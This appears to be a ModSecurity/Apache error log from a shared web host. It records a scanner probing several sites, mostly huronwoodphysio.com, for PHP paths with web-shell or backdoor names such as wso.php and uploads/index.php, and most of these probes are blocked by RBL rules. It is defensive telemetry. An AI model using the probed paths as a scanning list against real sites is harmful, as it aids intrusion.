[Tue May 26 14:22:40.990243 2026] [security2:error] [pid 606909:tid 607156] [client 20.226.60.108:22342] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "huronwoodphysio.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVfWF0yRtX9qA7aVUVaqQAAAPo"]
[Tue May 26 14:22:41.174117 2026] [security2:error] [pid 606909:tid 607152] [client 20.226.60.108:22342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVfWV0yRtX9qA7aVUVarQAAAPY"]
[Tue May 26 14:22:41.174243 2026] [security2:error] [pid 606909:tid 607152] [client 20.226.60.108:22342] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVfWV0yRtX9qA7aVUVarQAAAPY"]
[Tue May 26 14:22:41.527969 2026] [security2:error] [pid 606909:tid 607153] [client 20.226.60.108:22387] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/ws83.php"] [unique_id "ahVfWV0yRtX9qA7aVUVasgAAAPc"]
[Tue May 26 14:22:41.528083 2026] [security2:error] [pid 606909:tid 607153] [client 20.226.60.108:22387] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/ws83.php"] [unique_id "ahVfWV0yRtX9qA7aVUVasgAAAPc"]
[Tue May 26 14:22:41.894949 2026] [security2:error] [pid 606909:tid 607070] [client 20.226.60.108:46633] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/atex1.php"] [unique_id "ahVfWV0yRtX9qA7aVUVavAAAAKQ"]
[Tue May 26 14:22:41.895096 2026] [security2:error] [pid 606909:tid 607070] [client 20.226.60.108:46633] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/atex1.php"] [unique_id "ahVfWV0yRtX9qA7aVUVavAAAAKQ"]
[Tue May 26 14:22:42.258706 2026] [security2:error] [pid 606909:tid 607058] [client 20.226.60.108:14403] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/class-t.api.php"] [unique_id "ahVfWl0yRtX9qA7aVUVaxgAAAJg"]
[Tue May 26 14:22:42.258817 2026] [security2:error] [pid 606909:tid 607058] [client 20.226.60.108:14403] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/class-t.api.php"] [unique_id "ahVfWl0yRtX9qA7aVUVaxgAAAJg"]
[Tue May 26 14:22:42.473508 2026] [security2:error] [pid 606909:tid 607047] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfWl0yRtX9qA7aVUVaxQAAAI0"]
[Tue May 26 14:22:42.592996 2026] [security2:error] [pid 606909:tid 607123] [client 196.51.57.204:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVfWl0yRtX9qA7aVUVa2AAAANk"], referer: https://www.anujtradingco.com/
[Tue May 26 14:22:42.622642 2026] [security2:error] [pid 606909:tid 607053] [client 20.226.60.108:22383] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/w.php"] [unique_id "ahVfWl0yRtX9qA7aVUVa4QAAAJM"]
[Tue May 26 14:22:42.622739 2026] [security2:error] [pid 606909:tid 607053] [client 20.226.60.108:22383] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/w.php"] [unique_id "ahVfWl0yRtX9qA7aVUVa4QAAAJM"]
[Tue May 26 14:22:42.978058 2026] [security2:error] [pid 606909:tid 607145] [client 20.226.60.108:14481] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/bless.php"] [unique_id "ahVfWl0yRtX9qA7aVUVa6AAAAO8"]
[Tue May 26 14:22:42.978144 2026] [security2:error] [pid 606909:tid 607145] [client 20.226.60.108:14481] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/bless.php"] [unique_id "ahVfWl0yRtX9qA7aVUVa6AAAAO8"]
[Tue May 26 14:22:43.328992 2026] [security2:error] [pid 606909:tid 607111] [client 20.226.60.108:60655] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/sagax1.php"] [unique_id "ahVfW10yRtX9qA7aVUVa9gAAAM0"]
[Tue May 26 14:22:43.329118 2026] [security2:error] [pid 606909:tid 607111] [client 20.226.60.108:60655] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/sagax1.php"] [unique_id "ahVfW10yRtX9qA7aVUVa9gAAAM0"]
[Tue May 26 14:22:43.694853 2026] [security2:error] [pid 606909:tid 607122] [client 20.226.60.108:42322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wpc.php"] [unique_id "ahVfW10yRtX9qA7aVUVbAQAAANg"]
[Tue May 26 14:22:43.694971 2026] [security2:error] [pid 606909:tid 607122] [client 20.226.60.108:42322] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wpc.php"] [unique_id "ahVfW10yRtX9qA7aVUVbAQAAANg"]
[Tue May 26 14:22:43.934221 2026] [security2:error] [pid 606909:tid 607074] [client 196.51.57.204:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVfW10yRtX9qA7aVUVbBwAAAKg"], referer: https://www.anujtradingco.com/blog-2/blog-boxed-bigtext/?unapproved=1280661&moderation-hash=635f273bee50743c651750021935dde8
[Tue May 26 14:22:44.066657 2026] [security2:error] [pid 606909:tid 607073] [client 20.226.60.108:19103] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/fone1.php"] [unique_id "ahVfXF0yRtX9qA7aVUVbFAAAAKc"]
[Tue May 26 14:22:44.066781 2026] [security2:error] [pid 606909:tid 607073] [client 20.226.60.108:19103] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/fone1.php"] [unique_id "ahVfXF0yRtX9qA7aVUVbFAAAAKc"]
[Tue May 26 14:22:44.212137 2026] [security2:error] [pid 606909:tid 607109] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfW10yRtX9qA7aVUVbBAAAAMs"]
[Tue May 26 14:22:44.297162 2026] [security2:error] [pid 606909:tid 607134] [client 4.201.75.230:5469] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/goods.php"] [unique_id "ahVfXF0yRtX9qA7aVUVbHgAAAOQ"]
[Tue May 26 14:22:44.449578 2026] [security2:error] [pid 606909:tid 607136] [client 20.226.60.108:46643] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/ncx.php"] [unique_id "ahVfXF0yRtX9qA7aVUVbIQAAAOY"]
[Tue May 26 14:22:44.449688 2026] [security2:error] [pid 606909:tid 607136] [client 20.226.60.108:46643] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/ncx.php"] [unique_id "ahVfXF0yRtX9qA7aVUVbIQAAAOY"]
[Tue May 26 14:22:44.822859 2026] [security2:error] [pid 606909:tid 607154] [client 20.226.60.108:39864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-admin/js/index.php"] [unique_id "ahVfXF0yRtX9qA7aVUVbLwAAAPg"]
[Tue May 26 14:22:44.822962 2026] [security2:error] [pid 606909:tid 607154] [client 20.226.60.108:39864] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-admin/js/index.php"] [unique_id "ahVfXF0yRtX9qA7aVUVbLwAAAPg"]
[Tue May 26 14:22:45.177414 2026] [security2:error] [pid 606909:tid 607152] [client 20.226.60.108:19085] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wso.php"] [unique_id "ahVfXV0yRtX9qA7aVUVbMwAAAPY"]
[Tue May 26 14:22:45.177542 2026] [security2:error] [pid 606909:tid 607152] [client 20.226.60.108:19085] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wso.php"] [unique_id "ahVfXV0yRtX9qA7aVUVbMwAAAPY"]
[Tue May 26 14:22:45.541115 2026] [security2:error] [pid 606909:tid 607143] [client 20.226.60.108:39819] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/zup.php73"] [unique_id "ahVfXV0yRtX9qA7aVUVbPgAAAO0"]
[Tue May 26 14:22:45.541215 2026] [security2:error] [pid 606909:tid 607143] [client 20.226.60.108:39819] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/zup.php73"] [unique_id "ahVfXV0yRtX9qA7aVUVbPgAAAO0"]
[Tue May 26 14:22:45.897701 2026] [security2:error] [pid 606909:tid 607157] [client 20.226.60.108:22369] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/k.php"] [unique_id "ahVfXV0yRtX9qA7aVUVbSgAAAPs"]
[Tue May 26 14:22:45.897826 2026] [security2:error] [pid 606909:tid 607157] [client 20.226.60.108:22369] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/k.php"] [unique_id "ahVfXV0yRtX9qA7aVUVbSgAAAPs"]
[Tue May 26 14:22:45.996612 2026] [security2:error] [pid 606909:tid 607041] [client 4.201.75.230:5474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/class-t.api.php"] [unique_id "ahVfXV0yRtX9qA7aVUVbTgAAAIc"]
[Tue May 26 14:22:46.250129 2026] [security2:error] [pid 606909:tid 607147] [client 20.226.60.108:19129] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-blink.php"] [unique_id "ahVfXl0yRtX9qA7aVUVbVQAAAPE"]
[Tue May 26 14:22:46.250253 2026] [security2:error] [pid 606909:tid 607147] [client 20.226.60.108:19129] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-blink.php"] [unique_id "ahVfXl0yRtX9qA7aVUVbVQAAAPE"]
[Tue May 26 14:22:46.742843 2026] [security2:error] [pid 606909:tid 607130] [client 20.226.60.108:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "huronwoodphysio.com"] [uri "/index.php"] [unique_id "ahVfXl0yRtX9qA7aVUVbZgAAAOA"]
[Tue May 26 14:22:46.742881 2026] [security2:error] [pid 606909:tid 607130] [client 20.226.60.108:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "huronwoodphysio.com"] [uri "/index.php"] [unique_id "ahVfXl0yRtX9qA7aVUVbZgAAAOA"]
[Tue May 26 14:22:46.743053 2026] [security2:error] [pid 606909:tid 607140] [client 20.226.60.108:46596] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "huronwoodphysio.com"] [uri "/randkeyword.PhP7"] [unique_id "ahVfXl0yRtX9qA7aVUVbZAAAAOo"]
[Tue May 26 14:22:46.756366 2026] [security2:error] [pid 606909:tid 607078] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfXl0yRtX9qA7aVUVbXAAAAKw"]
[Tue May 26 14:22:47.352415 2026] [autoindex:error] [pid 606909:tid 607133] [client 20.226.60.108:46596] AH01276: Cannot serve directory /home2/huron6a0/public_html/wp-admin/css/colors/ectoplasm/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:22:47.353208 2026] [security2:error] [pid 606909:tid 607133] [client 20.226.60.108:46596] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "huronwoodphysio.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVfX10yRtX9qA7aVUVbcwAAAOM"]
[Tue May 26 14:22:47.547156 2026] [security2:error] [pid 606909:tid 607126] [client 20.226.60.108:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "huronwoodphysio.com"] [uri "/wp-content/index.php"] [unique_id "ahVfX10yRtX9qA7aVUVbfwAAANw"]
[Tue May 26 14:22:47.553775 2026] [security2:error] [pid 606909:tid 607163] [client 20.226.60.108:46596] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "huronwoodphysio.com"] [uri "/wp-content/"] [unique_id "ahVfX10yRtX9qA7aVUVbfQAAAQE"]
[Tue May 26 14:22:47.734929 2026] [security2:error] [pid 606909:tid 607157] [client 20.226.60.108:46596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/ww5.php"] [unique_id "ahVfX10yRtX9qA7aVUVbhAAAAPs"]
[Tue May 26 14:22:47.735069 2026] [security2:error] [pid 606909:tid 607157] [client 20.226.60.108:46596] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/ww5.php"] [unique_id "ahVfX10yRtX9qA7aVUVbhAAAAPs"]
[Tue May 26 14:22:48.094327 2026] [security2:error] [pid 606909:tid 607123] [client 20.226.60.108:39164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/2.php"] [unique_id "ahVfYF0yRtX9qA7aVUVbkwAAANk"]
[Tue May 26 14:22:48.094490 2026] [security2:error] [pid 606909:tid 607123] [client 20.226.60.108:39164] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/2.php"] [unique_id "ahVfYF0yRtX9qA7aVUVbkwAAANk"]
[Tue May 26 14:22:48.162420 2026] [security2:error] [pid 606909:tid 607052] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfX10yRtX9qA7aVUVbhwAAAJI"]
[Tue May 26 14:22:48.462315 2026] [security2:error] [pid 606909:tid 607130] [client 20.226.60.108:22381] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-admin/classwithtostring.php"] [unique_id "ahVfYF0yRtX9qA7aVUVbogAAAOA"]
[Tue May 26 14:22:48.462424 2026] [security2:error] [pid 606909:tid 607130] [client 20.226.60.108:22381] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-admin/classwithtostring.php"] [unique_id "ahVfYF0yRtX9qA7aVUVbogAAAOA"]
[Tue May 26 14:22:48.831667 2026] [security2:error] [pid 606909:tid 607111] [client 20.226.60.108:48848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/atomlib.php"] [unique_id "ahVfYF0yRtX9qA7aVUVbrwAAAM0"]
[Tue May 26 14:22:48.831788 2026] [security2:error] [pid 606909:tid 607111] [client 20.226.60.108:48848] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/atomlib.php"] [unique_id "ahVfYF0yRtX9qA7aVUVbrwAAAM0"]
[Tue May 26 14:22:48.939104 2026] [security2:error] [pid 606909:tid 607051] [client 14.187.162.164:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfYF0yRtX9qA7aVUVbqgAAAJE"]
[Tue May 26 14:22:49.186377 2026] [security2:error] [pid 606909:tid 607058] [client 20.226.60.108:19135] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/p.php"] [unique_id "ahVfYV0yRtX9qA7aVUVbvgAAAJg"]
[Tue May 26 14:22:49.186488 2026] [security2:error] [pid 606909:tid 607058] [client 20.226.60.108:19135] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/p.php"] [unique_id "ahVfYV0yRtX9qA7aVUVbvgAAAJg"]
[Tue May 26 14:22:49.206000 2026] [security2:error] [pid 606909:tid 607085] [client 202.141.83.254:53971] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfYV0yRtX9qA7aVUVbvwAAALM"]
[Tue May 26 14:22:49.206133 2026] [security2:error] [pid 606909:tid 607085] [client 202.141.83.254:53971] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfYV0yRtX9qA7aVUVbvwAAALM"]
[Tue May 26 14:22:49.546463 2026] [security2:error] [pid 606909:tid 607102] [client 20.226.60.108:46617] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/php.php"] [unique_id "ahVfYV0yRtX9qA7aVUVbygAAAMQ"]
[Tue May 26 14:22:49.546544 2026] [security2:error] [pid 606909:tid 607102] [client 20.226.60.108:46617] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/php.php"] [unique_id "ahVfYV0yRtX9qA7aVUVbygAAAMQ"]
[Tue May 26 14:22:49.914827 2026] [security2:error] [pid 606909:tid 607073] [client 20.226.60.108:39150] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/test1.php"] [unique_id "ahVfYV0yRtX9qA7aVUVb0gAAAKc"]
[Tue May 26 14:22:49.914941 2026] [security2:error] [pid 606909:tid 607073] [client 20.226.60.108:39150] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/test1.php"] [unique_id "ahVfYV0yRtX9qA7aVUVb0gAAAKc"]
[Tue May 26 14:22:50.296165 2026] [security2:error] [pid 606909:tid 607071] [client 20.226.60.108:14512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/uploads/min.php"] [unique_id "ahVfYl0yRtX9qA7aVUVb3QAAAKU"]
